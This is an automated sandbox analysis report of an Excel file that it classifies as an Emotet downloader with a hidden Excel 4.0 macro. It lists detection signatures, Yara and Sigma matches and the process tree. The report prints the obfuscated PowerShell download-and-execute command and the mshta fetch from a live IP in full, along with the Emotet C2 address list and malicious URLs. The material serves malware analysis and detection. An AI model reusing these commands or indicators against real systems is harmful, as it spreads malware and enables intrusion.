Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
imedpub.com_10.xls

Overview

General Information

Sample Name:imedpub.com_10.xls
Analysis ID:562396
MD5:b7d1edc6031adb3dfb8b7a4489da9102
SHA1:fbb0c3649b1741de48c037cea19f088acad5c6a6
SHA256:6a9dd96ee5aeaedd9045f2bd76b3bd8d7f7b42cc37c46ad076791e33b1bb2fdc
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Searches for user specific document files
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Contains functionality to detect virtual machines (SLDT)
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 152 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2792 cmdline: cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 1176 cmdline: mshta http://91.240.118.168/zzx/ccv/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2212 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2416 cmdline: C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 1160 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2824 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",ZiXeiVCTiyE MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2940 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",lrHfvn MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 1180 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
imedpub.com_10.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x108a2:$s1: Excel
  • 0x11913:$s1: Excel
  • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
imedpub.com_10.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
    imedpub.com_10.xlsINDICATOR_OLE_Excel4Macros_DL2Detects OLE Excel 4 Macros documents acting as downloadersditekSHen
    • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
    • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
    • 0x946:$x1: * #,##0
    • 0x952:$x1: * #,##0
    • 0x9fb:$x1: * #,##0
    • 0xa0a:$x1: * #,##0
    • 0xa36:$x1: * #,##0

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\imedpub.com_10.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x108a2:$s1: Excel
    • 0x11913:$s1: Excel
    • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\imedpub.com_10.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\Users\user\Desktop\imedpub.com_10.xlsINDICATOR_OLE_Excel4Macros_DL2Detects OLE Excel 4 Macros documents acting as downloadersditekSHen
      • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
      • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
      • 0x946:$x1: * #,##0
      • 0x952:$x1: * #,##0
      • 0x9fb:$x1: * #,##0
      • 0xa0a:$x1: * #,##0
      • 0xa36:$x1: * #,##0
      C:\Users\Public\Documents\ssd.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000C.00000002.538615152.0000000002850000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000B.00000002.496653771.0000000000331000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            0000000A.00000002.494317741.0000000002F11000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              0000000F.00000002.673473149.0000000002FC1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000F.00000002.672675374.0000000000CF1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 65 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  12.2.rundll32.exe.9c0000.4.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    15.2.rundll32.exe.2f90000.25.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      12.2.rundll32.exe.a20000.6.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        15.2.rundll32.exe.2b60000.13.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          15.2.rundll32.exe.2b60000.13.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 97 entries

                            Sigma Overview

                            System Summary

                            barindex
                            Sigma detected: Windows Shell File Write to Suspicious Folder
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 1176, TargetFilename: C:\Users\user\AppData\Local
                            Sigma detected: MSHTA Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1176, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2128
                            Sigma detected: Suspicious MSHTA Process Patterns
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.168/zzx/ccv/fe.html, CommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2792, ProcessCommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, ProcessId: 1176
                            Sigma detected: Microsoft Office Product Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html, CommandLine: cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 152, ProcessCommandLine: cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html, ProcessId: 2792
                            Sigma detected: Suspicious PowerShell Command Line
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1176, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2128
                            Sigma detected: Mshta Spawning Windows Shell
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1176, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2128
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1176, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2128

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: https://www.yeald.finance/wp-admAvira URL Cloud: Label: malware
                            Source: https://palankhir.hu/tools/GJRNhAvira URL Cloud: Label: malware
                            Source: https://palankhir.hu/tools/GJRNhZHz/Avira URL Cloud: Label: malware
                            Source: http://tattooblog.cn/wp-includes/KJLv/PE3Avira URL Cloud: Label: malware
                            Source: https://weddingbandsirelandjbk.com/hgsynt2/o/Avira URL Cloud: Label: malware
                            Source: https://umanostudio.com/wp-adminAvira URL Cloud: Label: malware
                            Source: http://tattooblog.cn/wp-includes/KJLv/Avira URL Cloud: Label: malware
                            Source: http://masboni.com/wp-admin/3zUQl/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.htmloAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.htmlfunctionAvira URL Cloud: Label: malware
                            Source: http://starspeedng.com/One-File/Avira URL Cloud: Label: malware
                            Source: http://starspeedng.com/One-File/U3Trml/Avira URL Cloud: Label: phishing
                            Source: https://getcode.info/wp-content/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/zzx/ccv/fe.html6Avira URL Cloud: Label: malware
                            Source: https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/PE3Avira URL Cloud: Label: malware
                            Source: http://sneakadream.com/wp-contenAvira URL Cloud: Label: phishing
                            Source: https://tanquessepticos.com/wp-aAvira URL Cloud: Label: malware
